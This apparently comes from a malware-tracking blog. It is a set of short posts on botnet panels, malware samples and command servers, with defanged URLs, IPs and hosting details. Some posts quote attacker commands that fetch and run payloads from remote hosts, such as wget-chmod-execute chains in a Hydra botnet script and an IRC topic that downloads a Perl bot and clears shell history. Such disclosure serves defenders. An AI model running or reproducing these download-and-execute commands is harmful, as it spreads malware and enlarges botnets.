poweroftech.com(DiamondFox Hosted In Russian Federation Moscow Mediaserviceplus Ltd.)

Uncategorized

Resolved : [ poweroftech.com ] To [ 193.0.200.89 ] Panel here : hxxp://poweroftech.com/poweroftech.com/soul/ Sample here : hxxp://www.gramer.pro/get/run.exe Other samples : hxxp://www.gramer.pro/get/ Diferent folders : hxxp://poweroftech.com/ Loader.bat : hxp://poweroftech.com/sin/  or direct link : hxxp://poweroftech.com/sin/loader.bat Hosting Infos : http://whois.domaintools.com/193.0.200.89

Hydra Botnet (Hosted In France Paris Hexatom)

Uncategorized

Around 100 hydra bots inside. Server : 149.91.89.253:6667 Channel : #perls Url’s : hxxp://208.67.1.142/ddos.pl hxxp://208.67.1.142/hack/ u can get the rest of files here Binary.sh : cd /tmp && wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel cd /tmp && wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips cd /tmp && wget -q hxxp://208.67.1.142/hack/telsh4 &&Read more...

Trojan.GenericKD.3018192 (Hosted In Germany Falkenstein Hetzner Online Gmbh)

Uncategorized

Email Spam  via these smtp servers : “cdptpa-pub-iedge-vip.email.rr.com” “smtp.orange.fr” “smtp.sina.com” “smtp.googlemail.com” “smtp.tiscali.co.uk” “out.alice.it” Servers used to spam : “173.194.195.16:25” “78.47.198.134:80” “62.24.139.11:25” “107.14.166.70:25” “193.252.22.86:25” “82.57.200.132:25” “202.108.6.242:25” Downloaded files : “GET /libeay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent: Mozilla/4.0 (compatible; Synapse)” “GET /ssleay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent:Read more...

Worm Porphiex

Uncategorized

Domains used by the worm : “tuhocphp.net” “milomaine.org” “milwaukeearmedforcesweek.org” “millplainlibrary.org” “mimemoria.org” “militarytrial.org” “milesbuckinghamlaw.org” “millcreek-construction.org” “milpitasvoter.org” “milkingshadows.org” “millionairemakers.org” “millgroup.org” “mimedrive.org” “millriverwatershed.org” “minaple.org” “millercountyga.org” “milwaukeelandmarks.org” “milyonbabies.org” “military-law.org” “mindfullife.org” Servers used by the worm : “220.181.87.80:5050” “112.78.4.160:80” “213.186.33.5:25” “82.165.73.126:25” “199.34.228.68:25” “81.169.145.84:25” “184.168.221.20:25” “82.165.100.254:25” “92.61.157.100:25” “184.168.221.53:25” “173.255.220.88:25” “82.165.100.228:25” “184.168.221.76:25” “198.11.204.78:25” “143.95.43.78:25” “104.25.88.29:25” “74.208.60.100:25” “66.39.35.237:25” “50.63.202.34:25” “50.63.202.18:25” Downloaded files :Read more...

comment.dyn.mk(Linux Irc Bots Hosted In Korea, Republic Of Seoul Sk Broadband Co Ltd)

Uncategorized

Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] maybe hacked machine. $server = ‘comment.dyn.mk’ unless $server; my $port = ‘6667’; [11:00] * Now talking in #kill  (around 100 bots inside) [11:00] * Topic is ‘wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c ‘ [11:00] * Set by anonplus on Thu Jan 07 17:06:34 URead more...

inmrvogurin.ru(Pony Hosted In Macao Macau Alan Hqservers Web Studio)

Uncategorized

This guy keep changing domainnames but he uses the same shit. Resolved : [ inmrvogurin.ru ] To [ 163.53.247.144 ] URL’S : hxxp://inmrvogurin.ru/SY/test/gate.php hxxp://inmrvogurin.ru/SY/test/admin.php TF leters in red maybe a tribute to trojanforge. Sample here : hxxp://inmrvogurin.ru/SY/test/micro.exe Hosting Infos : http://whois.domaintools.com/163.53.247.144

proexti.ufam.edu.br(Trojan.Win32.Generic Hosted In Brazil Manaus Associacao Rede Nacional De Ensino E Pesquisa)

Uncategorized

This is the downloader : hxxp://www.xup.in/dl,79161341/010-RELATORIOFINAL_2601.doc.exe.7z/ Domain used to donwload the trojan : hellolink.biz 110.4.45.31 URL : hxxp://hellolink.biz/pinjam.my/counter/WinProc.zip unzip the file the trojan exe is inside. Trojan is packed with Themida and gets file from here : proexti.ufam.edu.br/xmlrpc/content/count/B/fix.php Hosting Infos : http://whois.domaintools.com/200.129.163.16